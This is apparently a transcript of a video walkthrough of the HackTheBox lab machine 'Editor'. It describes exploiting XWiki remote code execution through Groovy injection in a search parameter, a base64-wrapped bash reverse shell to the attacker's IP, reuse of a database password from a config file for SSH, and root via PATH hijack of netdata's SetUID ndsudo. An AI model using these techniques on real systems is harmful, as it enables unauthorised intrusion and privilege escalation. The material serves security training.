What's going on YouTube? This is IPSec. We do an editor from HackTheBox, which is a nice easy box that starts off with finding an outdated version of XWIKI that is vulnerable to remote code execution through injecting malicious groovy code into a search parameter. With a shell on the box, we can find a database password, which is in the Hibernate config file, and this password is reused for a local account on the box, so we can just SSH in as that user. And as them, we discover an application called netdata is installed, which has a SetUID binary that is vulnerable to path hijacking. So with that being said, let's just jump in. As always, we're going to start off with an nmap. So -sc for default scripts, sv enumerate versions, -vv for double verbose. This gives us things like the TTL, OA output all formats, put in the nmap directory and call it editor. Then the IP address of 10.10.11.80. This can take some time to run, so I've already ran it. Looking at the results, we have 3 ports open. The first one is SSH on port 22, and the banner tells us it's an Ubuntu server. Well, we also have HTTP on port 80. Its banner tells us it's Nginx, also running on Ubuntu, and the nmap script is directing us over to editor.htb, at least the HTTP server is. So let's just go ahead and add this to our host file. So let's do a sudo v etc host. Then we can add 10.10.11.80 editor.htb, save that. And then the final port is also an HTTP server listing on port 8080. The banner tells us it's Jetty, which I want to say this is mainly for Java applications, but I could be wrong. The title is XWIKI is initializing, so it looks like it's running some type of wiki software. And we can kind of confirm that with this page, right? And that is all we have on this. And we also see a JSession ID cookie. So yes, Jetty most likely is going to be Java. So let's go take a look at the main page, which was just editor.htb. So let's do editor.htb. And we get a futuristic code editor. Simplistic Code Pro, minimal, powerful, redefined developer. We do have a Debian package. So I'm just going to go ahead and download this real quick. Let's move the package into our directory. So let's do download star.deb over here. I'm going to make a directory called temp. And then I want to say AR-X will extract the Debian package. Let's see. Simplistic. There we go. So we have a Debian binary. The size is 4, so that's just going to be blank. But we do have control tar-xz inside of this Debian package. So if we do a tar-xvf on the control, we can also do it on data. I don't know exactly what control is. Let's see. If we do a less, it's just going to be the metadata of the Debian package. But it did give us a binary. So if we just go into user local bin, I'm just going to do a file on this. And let's see. We see it is an elf. Let's see. If we just do a strings against this, do we see anything interesting? At this point, we're probably leaving like the easy difficulty of doing any type of binary reversing. So I'm not going to go too deep into this if we don't have to. We see a bunch of pi, so this is probably going to be built by like pi installer. That's a common way to convert a Python script to an elf for exe. But if I search for this pi, let's see, installer, do we see any strings? Let's just do a grep-i installer. Yeah, this is definitely going to be pi installer. So we could keep trying to go and reverse this, but let's cast our net wide. Instead of going super down one rabbit hole, let's just take a look at the entire box. I'm looking to see if we have any potential like usernames. We have contact at editor.htb. We can press Control U to try to take a look at the page source. It doesn't look like anything is here. That is interesting. I don't know exactly what this is coded in. I expected to see more information on this page source. If we go to docs, it is directing us to wiki.editor.htb and then XWIKI. So let's go ahead and add that to our host file. So sudo v etc host. Then let's add the wiki editor, save that, refresh this page. And it looks like we get XWIKI main intro. I'm also just going to go to port 8080. So if we do HTTP 10.10.11.80, port 8080. Let's see if we get like the same exact wiki. It looks like we do. So I'm guessing Nginx has a path that will just redirect us to port 8080 on this virtual host because these look identical to me, right? We do notice a banner at the bottom. We see XWIKI Debian 15.10.8. It is the same thing here. So let's go ahead and search CVE details. And we're going to search for XWIKI to find any thing interesting, right? And we could go straight to like exploit DB, things like that. But I've tended to just like the CVE database first. One thing odd I've noticed is I think this table doesn't have any RCE column because we don't see, we do see a 2 SQL injection for XSS and 1 open. I wonder if it is considered XSS because this is 7 vulnerabilities in 2025. Over here, we only have 4, unless this table's a continuation of this one. Maybe it's just displayed weird. But we have code execution there, so I'm going to click that. Let's see. Does this appear on any of these? No. But as I was saying, I would expect one table to show me all the vulnerabilities. I don't think it does. I think you have to kind of look at both. We could look at those 2 SQL injections, but the code execution's much more interesting to me. I don't see any potential exploit or exploit available on this page. If we went to the remote code execution, we have a public exploit right here. So that's going to be where I start. And do we see what version? If I search version before 16, 16.4.1, we are on a 15, right? Let's see. If I go back here, 15.10.8. So this is before 15.10.11. So chances are it's going to be vulnerable to this. And it is unauthenticated, I think. Any guest can perform code execution through the Solr search. So we hit this URL, and then we give it a bunch of stuff. I see Groovy, which is, I'm going to say templating language, but that's probably wrong. It's probably just like a scripting language. But it hits this URL. So let's go ahead and try this. So I'm going to paste this on the wiki, get enter, and we see a 500 error. I don't see exactly what it is, caused by, looking at the stack trace, invalid URL. So it may have some type of bad character. So let's go ahead and send this through Burp Suite. Make sure the proxy is on, refresh. Then I'm going to send it to my repeater tab. And let's see. I don't know if I would need this last backtick. I'm going to go back to the proof of concept. Was that there? So we got a backtick here. It's starting the backtick before the host. So we definitely don't want that backtick. So I will remove that. And let's see. Do we get a error still? This is trying to run hello from search. And we see that here. Hello from search text 42. So it looks like that backtick was what was screwing us up. I'm just going to press Control-Shift-U to decode this. And we can see it a bit clearer. Hello from search text 23 plus 19. And since we see it actually doing this evaluation, the 23 plus 19, it's probably vulnerable, right? Let's see. This is the print line. I'm going to get rid of hello. And then we're just going to try to run a command. And if we went and Googled like Groovy code execution, it will tell us kind of how to run it. We give it a string and then .execute, I want to say. Online compiler, run Groovy executing shell commands. Let's see. So shell do. Okay, there we go. So it's doing an ls.execute.text. So that is essentially what we want to do. So we'll do the print line, and I'm always going to give it like ID first. So let's now URL encode this, run it, and we get a 500 error. I'm going to Control-Shift-U to URL decode, and we're going to encode everything. Because what I think is happening is we're just not encoding some of the key characters. If you remember the original payload, I want to say it had those like squiggly brackets and other things encoded. So let's just encode everything, send it, and we no longer get a 500, it's a 200. And then let's see, we have execute, text. I'm looking for any like thing that would say we ran code. There's the print line. There we go. Here's UID 997. So this is the output of the ID command. So we definitely have code execution. Now, this way in Groovy, I just know from experience, doesn't really accept a lot of like redirections and bash prompts, because I think it's doing just like a bash, or let's just say system and then arg1, arg2, kind of like this, right? And what we really want is to do system bash, then we want -c, and then we want our command here. When we do the -c, it's just going to run this as bash, and then we can do a bunch of like pipes, redirects, things like that to get a reverse shell working. When it's just like this, we can't. We could run it, like exploit it and download a script or a file to the server, and then send a second command to execute it. That's how most people work around it. But I want to show how to do it without dropping a file to the disk. At this point, you could probably just Google a GitHub, a proof of concept exploit for this, and then find someone's Python script and run that and just get a shell and kind of cheat your way to victory, I guess. Cheat's a bad word, but I always like just trying things manual first and then going and trying the bit harder way, right? So to test this out, I'm going to do echo please subscribe. And we want to see if we see this data, right? So let's just go and URL encode everything. Send this. And we see the output here, right? RSS feed on search. I probably should just put this here. And let's set this to auto scroll on text change. So right here is always going to be the output of our command. So let's Control-Shift-U to decode it. And then I'm going to try to base 64 encode this. So we're just going to do a base 64. And go ahead and encode this again. So convert selection, all characters, send it. And we don't have the output of our command. It's just telling us the command. And that's just because it's doing what I said it was doing. Like, it's not processing this pipe. We're echoing this, and it's treating this as a string. So in order to work around this, we can pass it actually as a list or an array. I don't know the correct terminology in Groovy, but if we put a bracket and we run the command, let's say bash, I'm going to put a full path here. It's going to be bin bash. I don't think you have to. And then a comma, -c, and then we're going to say the same thing. We can probably just copy this. I'm going to do echo, paste, and then close that out. So right now we just have a list.execute.list or .text. So we can convert this URL, encode all characters, send it, and there we go. We have the base 64 of please subscribe. So passing the system command as an array or a list makes it behave as you expect. So you can put things in each parameter, getting that -c so we can do this. And this is going to be important because now we can say echo base 64, then decode it, and then execute it in bash. And this base 64, we're going to put a reverse shell. So let's just do echo-n, we'll say bash-i, dev TCP 10.10.14.8 9001 0 and 1 like that. And then base 64, encode it. And I always hate having pluses if I don't need them because that's a weird special character in URL because it can either be like a space or a plus, like it's just weird. So I like just getting rid of it where I can. So we got rid of that plus. A plus is here. And I'm going to eyeball where that is in this string. I think it's probably here. And there we go. Now we just have a pure alphanumeric base 64. So let's go ahead and paste that there. And I think all we have to do now is encode this, right? So let's highlight the whole thing, convert selection URL, encode all characters, and let's do nclvnp 9001, send this, and boom, we have a shell. Awesome. So let's switch to a proper PTY. So we'll do import PTY spawn bin bash, then stty raw minus echo foreground enter enter, and we can export term is equal to x term, and that'll enable us to clear the screen. And we also have things like tab autocomplete. So let's go take a look at what we can do from here. And the first thing I normally do when popping a web server is poke at the database. Now, it's a little bit odd that I'm in this user lib directory. Most of the time when I pop a web server, I'm in like var dub or like /opt. This is managed by the like package manager, so like apt on Debian. So it's a little bit odd here. I don't see any like configs. If we do find.grep conf or something, we don't see anything. But since it's managed by the package manager, I'm going to go to where most configs by the package manager are located, which is in etc, right? So I'm going to just do a ls grep XWIKI, and we do see a directory here. So taking a look, we have xwiki.cfg. So let's go take a look at this so we can cat this. There's a bunch of comments. So what I'm going to do here is a grep-v to not include something. And I'm going to say if it starts with a comment, we're not going to include it. And then I'm going to do a grep period to just get everything that has text on it, right? And I don't see any like passwords or anything, right? There is a XML file, and sometimes configs are put in XML. I'm just going to grep like password on these files. And let's go to less-s. And let's see. We have Hibernate config XML. And Hibernate normally will contain things like database stuff for Java applications. And we have a password, the editor team 99. So let's go ahead and take a look at this Hibernate file. So I'm going to just go cat Hibernate config XML and then search on this. And right above this, we see a MySQL URI, right? This is the XWiki database. What is the user here? URL, oh, XWiki. So we already have that in our clipboard. So let's just do a mysql-u xwiki-p, paste, get into the database, use XWiki, show tables, and then look for like a XWiki users table, right? And I don't see anything. If we do user, nothing there. So at this point, we can Google like XWiki reset user password database, maybe, and see if we have anything here. There is a user index, change URL. Let's see. Login. XWikiDB, XWiki users is what the AI is saying, but there was no XWiki users. We have a XWiki strings, preferences, RCs or cycle bin, select stir from XWiki strings. Don't think this is it. Oh, we have it stored this way. I don't know exactly how this magic is working, but we do have a SHA-12 hash probably for the Neil user. I don't even know how to decode this. So before we go like too deep into there, let's just try to do something very quick. And that would be spray this password for all active users on the box, right? So I'm going to cat etc passwd, grep for everything that ends in sh. And there's only one, Oliver. I guess we could try root as well. But I'm going to start with Oliver. Let's grab that password again. So grep password out of Hibernate. There we go. And we can try a su-Oliver, pasting in the password. And let's see. The editor team 99 does not look like that worked. We could try SSH real quick. Oliver at 10.10.11.80. Yes. Paste in. And it works. I don't know if I did the right clipboard here. I'm surprised SU does not work, but SSH does. I'm 90% sure I'm using the SU command correctly. Help SU. Let's see. Suspend. What? su-h is what I wanted. Make the login shell. Yeah, su and then user. So not sure exactly what's going on there, why we can't just su, but ssh does work. So we get in as Oliver. And the first thing I normally do once I ssh as a user is check the sudo list, right? So we can copy this. We can do a sudo-l, sudo-l, then paste in the password. And Oliver cannot run sudo on this box. So the next thing I normally just look at really quick is finding what files are owned by my user, right? So we can just do find-user Oliver and put errors to dev null. And I also like grepping out anything that begins with /proc, sys, and probably run and dev. I don't want anything that starts there. I'll comment this out real quick and you can see why. There's just so many files with that, right? So I'll uncomment that pipe and you can see how much shorter this output is. So we can see Oliver really only owns files within the home directory and there's nothing that interesting. So I'm going to look at the groups and we are a member of netdata, which is an odd group. So let's do -group, netdata, run the same thing. And it looks like we have a program called netdata installed. So let's just copy this. We can go to CVE details and search netdata to see if there's any interesting things. And let's see, we have a privask in 2024. So if we click that, we see netdata is an open source observability tool. The nsudo or ndsudo tool shipped allows attacker to run arbitrary programs because this is SetUID bit set. So let's go ahead and just find this real quick. So we can do find /op netdata -name. Where is this located? It's here, and it's saying it is a SetUID file. So if we do lsla on this, we can see, yes, it is. It is owned by root. The SetUID bit is set. If I do a stat against this file, we can see 4750. This is the SetUID bit. And members of the netdata group can execute it. So our web shell here, we can't execute this binary because we're not a member of that group. If we tried to, we get permission denied. If we try to execute it here, it says 2 parameters are needed, but 1 was given. Another way we could find this is just doing a find /-perm. I think if we do -4000, it's going to show us all SetUID files. So let's just do dev null to hide errors. And we do have SetUID stuff here. And also if you run linpeas, linpeas is going to tell you this is a SetUID binary that it doesn't know about, right? So there's a lot of ways we could go about finding this. So I'm going to run with -help to see exactly how to use it. Let's see. Netdata, maybe -command. And then NVMe. So let's do -command NVMe. Command not recognized -command. Let's do NVMe. Not recognized. Maybe the command is NVMe-list. There we go. And it says NVMe is not available in the path. So this is a path injection, right? So I'm just going to go dev shm where I can write things freely. Let's v NVMe. Let's do bin bash. Let's execute bash. We can chmod +x on this. And then we can export path is equal to our current working directory, which is dev shm. And then we append path. So now if I echo path, this is the path. And when I type NVMe, the first thing it's going to look for it is in dev shm. So let's go ahead and run this same command again. And we get a shell, except we're still Oliver. So this is a SetUID binary, but it doesn't look like the actual nsudo ran SetUID 0. So when we just executed the bash script, it executed the bash script and didn't change our permissions, right? So we have to probably make our own binary. So I'm just going to go in make dir //dub because we'll eventually want to host this. V setuid.c. we have to include the standard library. So uni standard.h, int main, and then what do we want to do? Set UID 0, set GID 0. Then let's just do system bin bash. Then we can exit this. There we go. GCC set UID. I'm just going to call this NVMe. Then Python 3 HTTP server. Let's delete our NVMe and do a wget HTTP 10.10.1180 port 8000 NVMe to download our binary. 10.10 14.8 is my IP address. There we go. Let's do chmod plus x NVMe. So now we have this bash program that's going to call set UID 0, set GID 0, and then run. So when I run this, now we're root. So a simple set UID binary with path injection, and that's it. So hopefully you've enjoyed this. But before we end the video, I'm going to take a moment just to explain what just went on, because I'm sure there's some of you out there that haven't watched all my videos and have no idea what this whole set UID path injection and whatnot and why this all worked. So first off, I would recommend whenever you have questions in my videos, just go to ipsec.rocks and then type what you have a question about. If we search like set UID, you see me talking about set UIDs a lot. I would highly, highly, highly recommend the jail video, because with this video, we're actually using set UID to switch to different users other than root. And there's some tricks involved to do that. And a lot of people just don't really understand that's possible. But what set UID means, it's a special permission on a program that when the program has it, the other users that can execute the program have the ability to switch to whatever user owns it, right? So since this program was owned by root, let's do an LSLA on it real quick to confirm. Yes, since this program is owned by root, we can call set UID 0. If that program was owned by, let's say, Oliver, we could then call set UID 1000 and then switch to it. Now, it's important to note, not all syscalls will work to switch to the Oliver user. It's a little bit odd. That's why I recommend watching the jail video where I explain it, because honestly, if I had to do that, I'd go back to that video and see how I did it back then, because I don't remember, right? But so the set UID allows us to switch to different users. Now, it's very different from sudo, because sudo does a lot of things securely when you do that, right? If we do sudo-l, we're calling things like environment reset. And what this is going to do is reset the environment so we don't have a unexpected path that goes in. Now, the path, that's going to play a huge important role, because that's how your operating system knows to execute a program, right? If I do v, I execute v. And it does that by going down my path and checking all of these directories and then executing the first one it finds with v, right? We can do which v, and it's user bin. Now, if I make a new file, let's do touch v, give this executable. I need to do this. VV, that's weird to say. We're going to echo, please subscribe. Actually, no, let's troll myself real quick. Instead of doing this, let's delete that. Let's do a which nano. And I'm going to do a cp user bin nano and v of HTTP editor, right? So now if I executed v here, I'm actually in nano. So let's now type v, we're in vim, and that's because my path has not been manipulated, right? So if I do a export path is equal to pwd, then the path variable itself. Now I echo path. You can see home IPsec HTTP editor is up front. So when I do which v now, it's going to execute the v out of the editor directory, which is nano. If I did a sudo v, I go back into vim. And that's because sudo has the environment reset. So it's resetting that path so it's not vulnerable, right? Now, this is a common vulnerability in SetUID programs that aren't executed with sudo just because a lot of developers don't use absolute paths, right? If I go into this program, my setuid.c, you notice I put the full path here, bin bash, right? I am trolling myself. I'm pressing Shift V to like highlight this line, and it's not highlighting because I'm in Nano. Oh my God. Let's echo path. There we go. Now I can do this. I do not like that. I knew I'd troll myself eventually. I even put a control character in there. There we go. But anyways, I use the absolute path here. So no matter what, even if you have a bad path, it's not going to try to resolve it and pick the very first one, right? If this system command was just bash, right? Then I execute this program, it's going to be like, I don't know what bash is. Let me go through the path and find out where bash is in the directory, then execute that one. So that ndsudo was calling the NVMe binary, I think that's what the binary was called, without an absolute path. And that's what enabled us to do that path injection, or path hijack, maybe it's called. But that's why it was vulnerable. So hopefully that clears things up. If it didn't, definitely type in SetUID or like maybe path hijack, right? We can find other videos where I talk about it. So yeah, that's it. Oh, after recording the video, I noticed there was one thing I forgot to show that I was still curious about. When we're the XWIKI user, we couldn't SU as Oliver, right? If I do SU-Oliver, and then we copy this and try to run it, we get a authentication failure. So now that we're root, we can cat the auth log and see what's going on here. So we have check pass user unknown. Authentication failure, log name UID 997, EUID 997. So it's trying to switch to Oliver user, and we're getting user unknown. I went through AI and did a lot of checks, and everything seems to be configured correctly, right? I don't see any like specific denies of Oliver in Etsy. So if we like grep-r Oliver here, like none of these files is telling me that Oliver wouldn't be able to SU. We obviously have a shell. So if I grep for everything that ends in sh on Etsy past WD, Oliver has a shell. Interesting enough, the user I have, XWIKI, doesn't have a shell. And I haven't tested this out fully yet, but I'm pretty sure that's going to be the culprit. The other thing was like checking PAM modules. So if we like looked at SU, this configuration doesn't show that like only members of Wheel can log in. So these are all the things like I ran through. And then AI told me something that I don't know. I haven't confirmed the fact, but if your user that you currently have doesn't have a login shell, then the SU command or PAM just won't let you do any logins. So it's failing to authenticate our XWIKI user before we even switch to the Oliver user. So if I grep for Oliver here, Oliver is UID 1000. Actually, we wanted to grep XWIKI. My bad. We're 997, and this is set to no login. So let's go ahead real quick and Etsy past WD. And then we're going to set XWIKI to be bin bash. Save that. And we're going to see if this is now magically correct. Let's go back and do our grep password so we can get this password again. And we may have to log back into this box, unfortunately, but we'll see if we have to. SU-OLIVER, paste this. Authentication failure still. Let's do passwd, XWIKI. I'm just going to put the password to password. And then SSH, XWIKI at 10.10.11.80. Password. SU-Oliver. Paste this in, and it works. So I'm 90% sure that's why. Maybe we can do one last thing to test this out. Let's see. If we go back to, was it user sbin no login? I think if we use sudo, we can still jump to a shell as him. Is it -u Oliver bin bash? Okay. So su, that's what's on my clipboard. Wait, I'm Oliver. Did I just edit? What I edit real quick? XWIKI. I put Oliver to no login. That's too bash. Thankfully I caught that. User sbin no login. There we go. So now let's do a sudo -u xwiki bin bash. Still my clipboard. If we try to su to Oliver, it worked. It must be something to do with the shell now. I'm at a loss. Grep no login pass wd grep xwiki. Did I not save that? User sbin no login. So I'm not exactly sure. That's how I'm going to end the video, and I hate that. But sometimes you're just not sure on things, I guess. Oliver, I was really expecting that to fail, but maybe it's not failing because I started my session as root, and something weird is going on there. But yeah, that's going to be it. Apologies for the sloppy cut, but after recording the video, I talked with OXDF, and he kind of ran through the same thing. He actually asked Claude as well, and then Claude started saying that it's probably the account not having a shell, but OXDF had the foresight to question it and say, I've never heard of this. Are you sure it's a thing? And Claude was like, oh, maybe I'm hallucinating. Have you checked the systemd unit files? And that's when both of us were like, oh, shoot, we've become too reliant on using AI to question things because this is something we probably should have just tried instinctively, right? Systemd does have a lot of unique security features that you just don't think about when it comes to Linux, right? So I'm going to use the systemctl cat command, and that's just going to give me an easy way to view unit files. It has tab autocomplete, so we could just look through all the services. But if I do xwiki, we're going to see the unit file for this, and then all the standard stuff, but we have this security thing, and we can see the user and group this starts as private temp. This creates a new temp directory and like not chroot, but like gives each systemd service its own private temp, right? If we do ls/temp, we see all of this stuff. It's one of the reasons why I like writing to dev shm now, not just /temp, because there's a lot of funky things that can go on in temp directories that I just don't like. But there's no new privileges. This is new to me, at least I did not remember it. And if we look at exactly what it does, is it pretty much does what it says. It's going to attempt to prevent that service from gaining new privileges, normally through like exec or syscalls. And that's why we can't use the SU. It's just this thing blocking it, which is pretty cool. Protect system. This is going to mount a lot of things like read only. Like I think strict is going to be super strong. So like dev will be mounted read only. A bunch of other places like Etsy, things like that. And then we can also give unique read-only paths or read-write paths and just do a lot of hardening on individual services this way in systemd that I don't see happen that often. But that is going to be why that SU command was failing. So hope you guys enjoyed it. Take care, and I'll see you all next time.